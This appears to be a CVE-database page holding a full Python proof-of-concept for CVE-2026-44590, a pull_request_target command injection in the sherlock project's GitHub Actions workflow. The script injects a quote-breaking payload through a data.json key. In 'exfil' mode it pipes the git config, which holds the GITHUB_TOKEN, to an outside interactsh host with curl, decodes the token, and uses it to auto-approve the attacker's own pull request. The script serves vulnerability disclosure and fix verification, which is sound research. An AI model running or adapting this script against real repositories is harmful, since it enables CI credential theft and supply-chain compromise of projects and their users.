5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
""""""

import argparse
import base64
import json
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import urllib.error
import urllib.request
from datetime import datetime, timezone

HARMLESS_MARKER = "Command Injection confirmed at"
EXFIL_TOKEN_RE = re.compile(
    r"http\.https://github\.com/\.extraheader=AUTHORIZATION:\s*basic\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)

UPSTREAM = "sherlock-project/sherlock"
DATA_JSON_PATH = "sherlock_project/resources/data.json"
WORKFLOW_FILE = "validate_modified_targets.yml"

# Parent of the fix commit (6eaec5cc, "Fix command injection vuln", 2026-05-02).
# Resetting the fork's master to this SHA reproduces the pre-fix vulnerable
# workflow. Used by --vulnerable.
VULNERABLE_COMMIT = "271608fb22209ef15a775cce88dd07fd4fa76483"


# -----------------------------------------------------------------------------
# Helpers
# -----------------------------------------------------------------------------

def run(cmd, cwd=None, check=True, capture=True):
    """Run a shell command and return CompletedProcess."""
    proc = subprocess.run(
        cmd,
        cwd=cwd,
        check=check,
        capture_output=capture,
        text=True,
    )
    return proc


def log(msg, level="INFO"):
    ts = datetime.now(timezone.utc).strftime("%H:%M:%S")
    icons = {"INFO": "[*]", "OK": "[+]", "ERR": "[!]", "STEP": "[>]"}
    print(f"{ts} {icons.get(level, '[*]')} {msg}", flush=True)


def require_tool(tool):
    if not shutil.which(tool):
        log(f"Required tool not found: {tool}", "ERR")
        sys.exit(1)


def gh_api(endpoint, method="GET", fields=None):
    cmd = ["gh", "api", endpoint, "-X", method]
    if fields:
        for k, v in fields.items():
            cmd.extend(["-f", f"{k}={v}"])
    try:
        proc = run(cmd, check=True)
        return json.loads(proc.stdout) if proc.stdout.strip() else None
    except subprocess.CalledProcessError as e:
        log(f"gh api {endpoint} failed: {e.stderr.strip()}", "ERR")
        return None


# -----------------------------------------------------------------------------
# OAST (interactsh) integration
# -----------------------------------------------------------------------------

def find_interactsh_client():
    """Locate interactsh-client binary in PATH or ~/go/bin."""
    p = shutil.which("interactsh-client")
    if p:
        return p
    candidate = os.path.expanduser("~/go/bin/interactsh-client")
    if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
        return candidate
    return None


def spawn_interactsh():
    """
    Spawn interactsh-client as a subprocess.
    Returns (process, oast_url, log_path) or (None, None, None) on failure.
    """
    binary = find_interactsh_client()
    if not binary:
        log("interactsh-client not found in PATH or ~/go/bin", "ERR")
        log("Install with: go install github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest", "INFO")
        return None, None, None

    log_path = tempfile.mktemp(prefix="poc-oast-", suffix=".log")
    proc = subprocess.Popen(
        [binary, "-v", "-o", log_path],
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        text=True,
        bufsize=1,
    )

    # Read stdout until the OAST URL appears (typically within a few seconds)
    oast_url = None
    deadline = time.time() + 20
    url_re = re.compile(r"([a-z0-9]+\.oast\.[a-z]+)")
    while time.time() < deadline:
        line = proc.stdout.readline()
        if not line:
            time.sleep(0.2)
            continue
        m = url_re.search(line)
        if m:
            oast_url = "https://" + m.group(1)
            break

    if not oast_url:
        proc.terminate()
        log("Could not parse OAST URL from interactsh-client output", "ERR")
        return None, None, None

    return proc, oast_url, log_path


def check_oast_callback(log_path, marker, retries=6, delay=5):
    """
    Look for `marker` in the interactsh log.
    Polls a few times because callbacks can lag a few seconds after the
    workflow completes.
    """
    if not log_path or not os.path.isfile(log_path):
        return None
    for attempt in range(retries):
        with open(log_path, errors="replace") as f:
            content = f.read()
        if marker in content:
            return content
        if attempt < retries - 1:
            time.sleep(delay)
    return None


def extract_token_from_log(log_path, retries=6, delay=5):
    """
    Look for the AUTHORIZATION header dumped by `git config --list` in the
    interactsh log, extract the base64 blob, and decode it. Returns the
    decoded `x-access-token:ghs_...` string or None.
    """
    if not log_path or not os.path.isfile(log_path):
        return None
    for attempt in range(retries):
        with open(log_path, errors="replace") as f:
            content = f.read()
        m = EXFIL_TOKEN_RE.search(content)
        if m:
            try:
                decoded = base64.b64decode(m.group(1)).decode("utf-8", errors="replace")
                return decoded
            except (ValueError, base64.binascii.Error):
                return None
        if attempt < retries - 1:
            time.sleep(delay)
    return None


# -----------------------------------------------------------------------------
# Token-based PR approval
# -----------------------------------------------------------------------------

def parse_pr_number(pr_url):
    """Extract the PR number from a URL like https://github.com/o/r/pull/42."""
    m = re.search(r"/pull/(\d+)", pr_url or "")
    return int(m.group(1)) if m else None


def approve_pr_with_token(repo, pr_number, token):
    """
    Use the exfiltrated GITHUB_TOKEN to approve the attacker's own PR via
    the GitHub REST API. Returns the parsed JSON response or None.

    Mirrors the canonical PoC curl:
        curl -X POST \\
          -H "Authorization: token <GITHUB_TOKEN>" \\
          -H "Accept: application/vnd.github+json" \\
          https://api.github.com/repos/{repo}/pulls/{n}/reviews \\
          -d '{"event":"APPROVE","body":"All checks passed. LGTM!"}'
    """
    url = f"https://api.github.com/repos/{repo}/pulls/{pr_number}/reviews"
    body = json.dumps({
        "event": "APPROVE",
        "body": "All checks passed. LGTM!",
    }).encode("utf-8")
    req = urllib.request.Request(
        url,
        data=body,
        method="POST",
        headers={
            "Authorization": f"token {token}",
            "Accept": "application/vnd.github+json",
            "Content-Type": "application/json",
            "User-Agent": "poc-cve-pr-target",
        },
    )
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return json.loads(resp.read().decode("utf-8", errors="replace"))
    except urllib.error.HTTPError as e:
        body = e.read().decode("utf-8", errors="replace")
        log(f"GitHub API error {e.code}: {body[:200]}", "ERR")
        return None
    except urllib.error.URLError as e:
        log(f"Network error calling GitHub API: {e}", "ERR")
        return None


# -----------------------------------------------------------------------------
# Fork manipulation
# -----------------------------------------------------------------------------

def reset_fork_to_vulnerable(fork_repo, clone_url, commit_sha):
    """
    Force-reset the fork's master branch to a specific commit (the pre-fix
    revision). Used to reproduce the vulnerability against the original
    vulnerable workflow.
    """
    workdir = tempfile.mkdtemp(prefix="poc-reset-")
    try:
        log(f"Cloning {fork_repo} into temp dir for reset", "INFO")
        run(["git", "clone", clone_url, workdir])
        log(f"Resetting master to {commit_sha[:8]}", "INFO")
        run(["git", "reset", "--hard", commit_sha], cwd=workdir)
        log("Force-pushing to origin/master", "INFO")
        run(["git", "push", "--force", "origin", "master"], cwd=workdir)
        log("Fork master rolled back to vulnerable commit", "OK")
    finally:
        shutil.rmtree(workdir, ignore_errors=True)


# -----------------------------------------------------------------------------
# Payload construction
# -----------------------------------------------------------------------------

def build_payload(mode, oast_url):
    """
    Build a JSON key that, after the GitHub Actions templating engine
    expands it inside the `run:` block, breaks out of the surrounding
    double quotes and executes a curl.

    Vulnerable command (after templating):
        poetry run pytest ... --chunked-sites "<KEY>"

    Injection: close the quote, run a command, reopen the quote with echo.
    """
    if mode == "harmless":
        cmd = (
            f'curl -s -X POST -d "{HARMLESS_MARKER} $(date -u +%FT%TZ)" '
            f"{oast_url}/ci-test"
        )
    elif mode == "exfil":
        # Dumps git config to OAST. The base64-encoded token sits in
        # http.https://github.com/.extraheader. Then sleep keeps the
        # workflow (and the short-lived GITHUB_TOKEN) alive long enough
        # for the script to use the token (e.g. to approve the PR).
        cmd = (
            f"git config --list | curl -s -X POST -d @- {oast_url}/gitconfig; "
            "sleep 180"
        )
    else:
        raise ValueError(f"unknown mode: {mode}")

    # Close the double quote, run cmd, restart with `echo "` so the rest
    # of the templated command stays syntactically valid.
    return f'TestSite"; {cmd}; echo "'


def inject_payload(repo_dir, payload_key):
    """Add the payload key to data.json with a minimal valid site entry."""
    data_path = os.path.join(repo_dir, DATA_JSON_PATH)
    if not os.path.isfile(data_path):
        log(f"data.json not found at {data_path}", "ERR")
        sys.exit(1)

    with open(data_path) as f:
        data = json.load(f)

    if payload_key in data:
        log("Payload key already present in data.json (unexpected)", "ERR")
        sys.exit(1)

    data[payload_key] = {
        "errorType": "status_code",
        "url": "https://example.com/{}",
        "urlMain": "https://example.com/",
        "username_claimed": "test",
    }

    with open(data_path, "w") as f:
        json.dump(data, f, indent=4, sort_keys=True)

    log(f"Injected payload key into {DATA_JSON_PATH}", "OK")


# -----------------------------------------------------------------------------
# Workflow run polling
# -----------------------------------------------------------------------------

def find_workflow_run(repo, branch, since_iso, timeout=180):
    """Poll the Actions API for a workflow_run on the given branch."""
    log(f"Polling for workflow run on branch '{branch}' (timeout {timeout}s)", "STEP")
    deadline = time.time() + timeout
    while time.time() < deadline:
        runs = gh_api(
            f"repos/{repo}/actions/runs?branch={branch}&event=pull_request_target&per_page=5"
        )
        if runs and runs.get("workflow_runs"):
            for r in runs["workflow_runs"]:
                if r.get("created_at", "") >= since_iso:
                    return r
        time.sleep(5)
    return None


def wait_for_run_completion(repo, run_id, timeout=300):
    log(f"Waiting for run {run_id} to complete", "STEP")
    deadline = time.time() + timeout
    while time.time() < deadline:
        run_data = gh_api(f"repos/{repo}/actions/runs/{run_id}")
        if not run_data:
            time.sleep(5)
            continue
        status = run_data.get("status")
        conclusion = run_data.get("conclusion")
        log(f"  status={status} conclusion={conclusion}")
        if status == "completed":
            return run_data
        time.sleep(10)
    return None


# -----------------------------------------------------------------------------
# Main flow
# -----------------------------------------------------------------------------

def main():
    parser = argparse.ArgumentParser(
        description=(
            "CVE-2026-44590 PoC by Astaruf\n"
            "RCE via pull_request_target Injection -> Supply Chain Compromise in sherlock-project/sherlock GitHub Actions Workflow\n"
            "\n"
            "Full write-up: https://nstsec.com/posts/sherlock-rce-pull-request-target-cve-2026-44590/\n"
            "\n"
            "Prerequisites:\n"
            "  gh auth login\n"
            "  go install github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest\n"
            "\n"
            "Quick start:\n"
            "  # Verify the upstream fix (expects FIX VERIFIED)\n"
            "  python3 poc.py --fork-owner <your-github-username>\n"
            "\n"
            "  # Reproduce the original vulnerability (expects VULNERABILITY CONFIRMED)\n"
            "  python3 poc.py --fork-owner <your-github-username> --vulnerable\n"
            "\n"
            "  # Full impact: token exfiltration + auto-approve PR\n"
            "  python3 poc.py --fork-owner <your-github-username> --vulnerable --mode exfil"
        ),
        formatter_class=argparse.RawTextHelpFormatter,
        epilog=__doc__,
    )
    parser.add_argument(
        "--fork-owner", required=True,
        help="GitHub username that owns the fork of sherlock-project/sherlock",
    )
    parser.add_argument(
        "--fork-name", default="sherlock",
        help="Name of the fork repository (default: sherlock)",
    )
    parser.add_argument(
        "--oast-url", default=None,
        help="OAST endpoint to receive the callback. If omitted, the script "
             "spawns an interactsh-client subprocess and auto-verifies the "
             "callback at the end (harmless mode only).",
    )
    parser.add_argument(
        "--mode", choices=["harmless", "exfil"], default="harmless",
        help=(
            "Payload type (default: harmless).\n"
            "\n"
            "  harmless\n"
            "      Single curl with a static confirmation string.\n"
            "      No secrets touched.\n"
            "\n"
            "  exfil\n"
            "      Dumps `git config --list` (which contains the GITHUB_TOKEN\n"
            "      base64-encoded by actions/checkout) to the OAST, then\n"
            "      sleeps 180s. The script grabs the token while the workflow\n"
            "      is alive and uses it to auto-approve the malicious PR via\n"
            "      the GitHub API."
        ),
    )
    parser.add_argument(
        "--base-branch", default="master",
        help="PR target branch on the fork (default: master)",
    )
    parser.add_argument(
        "--keep-branch", action="store_true",
        help="Do not delete the PoC branch after completion",
    )
    parser.add_argument(
        "--no-poll", action="store_true",
        help="Skip workflow run polling and exit after PR creation",
    )
    parser.add_argument(
        "--no-sync", action="store_true",
        help="Skip syncing the fork with upstream (useful when testing a pinned commit)",
    )
    parser.add_argument(
        "--vulnerable", action="store_true",
        help=f"Roll back the fork's master to the pre-fix commit ({VULNERABLE_COMMIT[:8]}) "
             "before running the PoC. Implies --no-sync.",
    )
    args = parser.parse_args()

    fork_repo = f"{args.fork_owner}/{args.fork_name}"
    branch_name = f"poc-cve-pr-target-{int(time.time())}"

    # 0. Prerequisites
    require_tool("gh")
    require_tool("git")

    # If no OAST URL provided, spawn interactsh-client and use its URL
    interactsh_proc = None
    interactsh_log = None
    auto_check = False
    if not args.oast_url:
        log("No --oast-url provided, spawning interactsh-client", "STEP")
        interactsh_proc, args.oast_url, interactsh_log = spawn_interactsh()
        if not args.oast_url:
            sys.exit(1)
        auto_check = True
        log(f"Interactsh URL: {args.oast_url}", "OK")

    log(f"Target fork:    {fork_repo}", "INFO")
    log(f"Base branch:    {args.base_branch}", "INFO")
    log(f"PoC branch:     {branch_name}", "INFO")
    log(f"Payload mode:   {args.mode}", "INFO")
    log(f"OAST endpoint:  {args.oast_url}", "INFO")

    # 1. Verify (or create) the fork
    log("Verifying fork", "STEP")
    info = gh_api(f"repos/{fork_repo}")
    fork_just_created = False
    if not info:
        log(f"Fork {fork_repo} not found, creating it", "STEP")
        run(["gh", "repo", "fork", UPSTREAM, "--clone=false"], check=True)
        # Forks are created asynchronously; poll until ready
        for _ in range(30):
            time.sleep(2)
            info = gh_api(f"repos/{fork_repo}")
            if info:
                break
        if not info:
            log("Fork creation timed out", "ERR")
            sys.exit(1)
        fork_just_created = True
        log("Fork created", "OK")
    if not info.get("fork"):
        log(f"{fork_repo} exists but is not a fork", "ERR")
        sys.exit(1)
    parent = info.get("parent", {}).get("full_name")
    if parent != UPSTREAM:
        log(f"{fork_repo} is a fork of {parent}, expected {UPSTREAM}", "ERR")
        sys.exit(1)
    log(f"Fork verified (parent: {parent})", "OK")

    # 2. Detect whether Actions are actually runnable on the fork.
    # Forks of repos that already contain workflows have a fork-level UI gate
    # ("Workflows aren't being run on this forked repository") that must be
    # cleared by clicking the banner once. There is no public API for this.
    # Heuristic: if the fork was just created OR has zero historical runs,
    # prompt the user to enable Actions in the browser.
    runs_data = gh_api(f"repos/{fork_repo}/actions/runs?per_page=1")
    total_runs = runs_data.get("total_count", 0) if runs_data else 0
    if fork_just_created or total_runs == 0:
        actions_url = f"https://github.com/{fork_repo}/actions"
        log("=" * 70, "INFO")
        log("MANUAL STEP REQUIRED", "INFO")
        log("=" * 70, "INFO")
        log(f"Open this URL in a browser:  {actions_url}", "INFO")
        log("Click 'I understand my workflows, go ahead and enable them'.", "INFO")
        log("This is required only once per fresh fork (GitHub-imposed).", "INFO")
        log("=" * 70, "INFO")
        try:
            input("Press ENTER once you've enabled Actions on the fork... ")
        except EOFError:
            log("Non-interactive shell, assuming Actions are enabled", "INFO")
        log("Continuing", "OK")

    # In exfil mode, enable "Allow GitHub Actions to create and approve PRs"
    # on the fork. This is OFF by default on forks, but it was enabled on the
    # upstream sherlock-project/sherlock at the time of the original report,
    # which is why GITHUB_TOKEN could approve PRs there. Enabling it on the
    # fork lets the PoC reproduce the full attack chain locally.
    if args.mode == "exfil":
        log("Enabling 'Actions can approve PRs' on fork (mirrors upstream setting)", "STEP")
        perm_proc = run([
            "gh", "api", "-X", "PUT",
            f"repos/{fork_repo}/actions/permissions/workflow",
            "-f", "default_workflow_permissions=write",
            "-F", "can_approve_pull_request_reviews=true",
        ], check=False)
        if perm_proc.returncode == 0:
            log("Setting enabled", "OK")
        else:
            log(f"Could not enable setting: {perm_proc.stderr.strip()}", "INFO")

    # Optionally roll back the fork to the pre-fix vulnerable commit.
    # --vulnerable implies --no-sync (otherwise the next sync would re-apply
    # the fix and undo the rollback).
    if args.vulnerable:
        log(f"--vulnerable: rolling fork back to commit {VULNERABLE_COMMIT[:8]}", "STEP")
        reset_fork_to_vulnerable(fork_repo, info["clone_url"], VULNERABLE_COMMIT)
        args.no_sync = True

    # Sync fork with upstream so we test the latest (potentially patched) workflow
    if args.no_sync:
        log("Skipping sync with upstream (--no-sync)", "INFO")
    else:
        log("Syncing fork with upstream", "STEP")
        sync_proc = run(
            ["gh", "repo", "sync", fork_repo, "--source", UPSTREAM],
            check=False,
        )
        if sync_proc.returncode == 0:
            log("Fork synced with upstream", "OK")
        else:
            log(f"Sync warning: {sync_proc.stderr.strip()}", "INFO")

    # 2. Clone the fork into a temp directory
    workdir = tempfile.mkdtemp(prefix="sherlock-poc-")
    repo_dir = os.path.join(workdir, args.fork_name)
    log(f"Cloning into {repo_dir}", "STEP")
    clone_url = info["clone_url"]
    run(["git", "clone", "--depth", "1", "--branch", args.base_branch,
         clone_url, repo_dir])
    log("Clone complete", "OK")

    try:
        # 3. Create branch
        log(f"Creating branch '{branch_name}'", "STEP")
        run(["git", "checkout", "-b", branch_name], cwd=repo_dir)

        # 4. Build and inject payload
        payload_key = build_payload(args.mode, args.oast_url.rstrip("/"))
        log(f"Payload key: {payload_key}", "INFO")
        inject_payload(repo_dir, payload_key)

        # 5. Commit and push
        log("Committing", "STEP")
        run(["git", "config", "user.email", "[email protected]"], cwd=repo_dir)
        run(["git", "config", "user.name", "poc"], cwd=repo_dir)
        run(["git", "add", DATA_JSON_PATH], cwd=repo_dir)
        run(["git", "commit", "-m", "Add new site: TestSite"], cwd=repo_dir)

        log("Pushing branch", "STEP")
        run(["git", "push", "-u", "origin", branch_name], cwd=repo_dir)
        log("Branch pushed", "OK")

        # 6. Open PR (fork -> fork)
        log(f"Opening PR {branch_name} -> {args.base_branch} on {fork_repo}", "STEP")
        since_iso = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
        pr_proc = run([
            "gh", "pr", "create",
            "--repo", fork_repo,
            "--base", args.base_branch,
            "--head", branch_name,
            "--title", "Add new site: TestSite",
            "--body", "PoC for pull_request_target command injection. "
                      "See CVE-2026-44590. Safe to close after the workflow runs.",
        ], cwd=repo_dir)
        pr_url = pr_proc.stdout.strip().splitlines()[-1]
        log(f"PR opened: {pr_url}", "OK")

        if args.no_poll:
            log("--no-poll set, exiting. Watch your OAST endpoint for callback.", "INFO")
            return

        # 7. Poll for workflow run
        run_data = find_workflow_run(fork_repo, branch_name, since_iso)
        if not run_data:
            log("No workflow run detected within timeout. "
                "Check manually: " + f"https://github.com/{fork_repo}/actions", "ERR")
            return
        log(f"Workflow run found: {run_data['html_url']}", "OK")

        # In exfil + auto_check we need to grab the token WHILE the workflow
        # is still running (the GITHUB_TOKEN expires when the run completes).
        # The payload includes a `sleep 180` to keep the workflow alive long
        # enough for us to extract the token and use it.
        approval_result = None
        decoded_token = None
        if auto_check and args.mode == "exfil":
            pr_number = parse_pr_number(pr_url)
            log("Polling OAST for token while workflow is alive", "STEP")
            poll_deadline = time.time() + 300
            while time.time() < poll_deadline:
                decoded_token = extract_token_from_log(interactsh_log, retries=1, delay=0)
                if decoded_token:
                    log(f"Token captured: {decoded_token}", "OK")
                    # Strip "x-access-token:" prefix to get raw ghs_... token
                    raw_token = decoded_token.split(":", 1)[-1]
                    if pr_number:
                        log(f"Approving PR #{pr_number} on {fork_repo} with stolen token", "STEP")
                        approval_result = approve_pr_with_token(fork_repo, pr_number, raw_token)
                        if approval_result:
                            log(f"PR approved by {approval_result.get('user', {}).get('login', '?')}: "
                                f"state={approval_result.get('state')}", "OK")
                            log(f"Review URL: {approval_result.get('html_url')}", "OK")
                    break
                # Check if workflow completed in the meantime
                run_status = gh_api(f"repos/{fork_repo}/actions/runs/{run_data['id']}")
                if run_status and run_status.get("status") == "completed":
                    break
                time.sleep(5)

        # If the exfil attack chain already succeeded, the workflow is just
        # running out its sleep timer. Skip the wait, the attacker doesn't
        # care about the run's final conclusion.
        if approval_result:
            log("Attack chain complete, skipping the rest of the workflow run", "OK")
            log(f"(The runner is still sleeping for ~3 minutes; logs at {run_data['html_url']})", "INFO")
            completed = run_data
        else:
            completed = wait_for_run_completion(fork_repo, run_data["id"])
            if not completed:
                log("Workflow did not complete in time", "ERR")
                return
            log(f"Run completed with conclusion: {completed.get('conclusion')}", "OK")
            log(f"Logs: {completed['html_url']}", "INFO")

        if auto_check and args.mode == "harmless":
            log("Checking interactsh log for OAST callback", "STEP")
            content = check_oast_callback(interactsh_log, HARMLESS_MARKER)
            if content:
                log("=" * 70, "OK")
                log("VULNERABILITY CONFIRMED: callback received from runner", "OK")
                log(f"Marker '{HARMLESS_MARKER}' found in OAST log", "OK")
                log("=" * 70, "OK")
            else:
                log("=" * 70, "INFO")
                log("FIX VERIFIED: no callback received from the runner", "INFO")
                log(f"Marker '{HARMLESS_MARKER}' NOT found in OAST log", "INFO")
                log("This is the expected behavior when the workflow is patched.", "INFO")
                log("=" * 70, "INFO")
        elif auto_check and args.mode == "exfil":
            if decoded_token:
                log("=" * 70, "OK")
                log("VULNERABILITY CONFIRMED: GITHUB_TOKEN exfiltrated", "OK")
                log(f"Decoded credential: {decoded_token}", "OK")
                if approval_result:
                    log(f"PR auto-approved via API: state={approval_result.get('state')}", "OK")
                    log(f"Review by: {approval_result.get('user', {}).get('login', '?')}", "OK")
                    log(f"Review URL: {approval_result.get('html_url')}", "OK")
                else:
                    log("PR approval was not attempted or failed (see errors above).", "INFO")
                log("(Token is short-lived and tied to this workflow run.)", "OK")
                log("=" * 70, "OK")
            else:
                log("=" * 70, "INFO")
                log("FIX VERIFIED: no token exfiltrated from the runner", "INFO")
                log("No 'http.extraheader=AUTHORIZATION: basic ...' found in OAST log", "INFO")
                log("Either the injection was blocked, or persist-credentials: false", "INFO")
                log("kept the token out of the git config (defense in depth).", "INFO")
                log("=" * 70, "INFO")
        elif args.mode == "harmless":
            log("Check the OAST endpoint. You should see a POST /ci-test "
                "with body 'Command Injection confirmed at <ts>'.", "INFO")
        else:
            log("Check the OAST endpoint. You should see a POST /gitconfig "
                "containing 'http.https://github.com/.extraheader=AUTHORIZATION: "
                "basic <base64>'. Decode the base64 to obtain the GITHUB_TOKEN.", "INFO")

    finally:
        if not args.keep_branch:
            log(f"Cleanup: deleting remote branch {branch_name}", "STEP")
            try:
                run(["git", "push", "origin", "--delete", branch_name],
                    cwd=repo_dir, check=False)
            except Exception:
                pass
        shutil.rmtree(workdir, ignore_errors=True)
        if interactsh_proc:
            log("Stopping interactsh-client", "STEP")
            interactsh_proc.terminate()
            try:
                interactsh_proc.wait(timeout=5)
            except subprocess.TimeoutExpired:
                interactsh_proc.kill()
            if interactsh_log and os.path.isfile(interactsh_log):
                try:
                    os.remove(interactsh_log)
                except OSError:
                    pass
        log("Done", "OK")


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        log("Interrupted", "ERR")
        sys.exit(130)